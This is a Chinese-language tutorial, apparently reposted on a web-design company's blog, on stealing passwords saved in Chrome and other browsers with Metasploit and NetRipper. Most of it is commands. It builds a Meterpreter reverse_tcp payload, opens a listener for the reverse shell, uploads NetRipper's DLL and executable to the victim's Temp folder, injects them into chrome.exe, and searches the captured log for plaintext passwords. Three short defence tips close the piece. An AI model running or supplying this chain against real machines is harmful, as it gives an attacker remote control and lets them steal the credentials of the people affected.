如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來學(xué)習(xí)下,希望你能有所收獲。

目前成都創(chuàng)新互聯(lián)公司已為成百上千家的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)站空間、網(wǎng)站托管維護(hù)、企業(yè)網(wǎng)站設(shè)計、龍馬潭網(wǎng)站維護(hù)等服務(wù),公司將堅持客戶導(dǎo)向、應(yīng)用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。

前言

我將手把手教會各位Buffer如何使用Metasploit+NetRipper獲取Chrome等瀏覽器內(nèi)保存的帳號密碼。

需要工具:

Kali Linux&Metasploit

NetRipper

1.下載并且配置NetRipper

git clone https://github.com/NytroRST/NetRipper.git

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試

cp DLL.x86.dll NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試

cp DLL.x64.dll NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試

2.生成Windows的Payload用于建立于目標(biāo)機(jī)器的連接

msfvenom -p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX -f exe > Payload.exe

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

3.啟動Metasploit并且進(jìn)行監(jiān)聽

msfconsole

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

use exploit/multi/handler

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

set payload windows/meterpreter/reverse_tcp

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

set LHOST IP

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

set LPORT 6666

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

options

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

exploit

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

目標(biāo)機(jī)運(yùn)行Payload獲取到反彈shell

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

4.上傳DLL和exe文件到目標(biāo)機(jī)器的C:\Users\Administrator\AppData\Local\Temp目錄下

Upload /root/Desjtop/NetRipper/x64/DLL.dll
Upload /root/Desjtop/NetRipper/x64/NetRipper.exe

 如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試

shell
NetRipper.exe

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    
運(yùn)行NetRipper.exe    

NetRipper.exe –w DLL.dll –l TEMP –p true –d 4096 –s user,pass

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

NetRipper.exe ConfiguredDLL.dll chrome.exe

我注入到了是chrome瀏覽器的進(jìn)程,你也可以注入到其他瀏覽器(火狐,QQ瀏覽器,360瀏覽器等等)的進(jìn)程,這里以Chrom瀏覽器為主

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

5.測試驗證

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    
如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

打開那個剛剛下載的txt文件

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試    

Ctir+F輸入pwpw或者pwd、pass、password等關(guān)鍵詞來搜索明文密碼

如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試

如果獲取失敗帳號密碼的話,可能是網(wǎng)站使用了Https協(xié)議,或者登陸時在本地就進(jìn)行了帳號口令的一個加密混淆!(個人推斷)   防范方法:

1.不要點(diǎn)擊來歷不明的文件

2.瀏覽器登錄可以掃描就掃描登錄

3.如果沒有必要個人建議不要在瀏覽器保存自己的社交帳號密碼

看完上述內(nèi)容是否對您有幫助呢?如果還想對相關(guān)知識有進(jìn)一步的了解或閱讀更多相關(guān)文章,請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝您對創(chuàng)新互聯(lián)的支持。

本文題目:如何進(jìn)行Metasploit+NetRipper獲取Chrome等瀏覽器帳號密碼測試
當(dāng)前路徑:http://bm7419.com/article28/jcgocp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供App設(shè)計、外貿(mào)網(wǎng)站建設(shè)網(wǎng)站內(nèi)鏈、網(wǎng)頁設(shè)計公司、網(wǎng)站策劃、網(wǎng)站營銷

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

網(wǎng)站托管運(yùn)營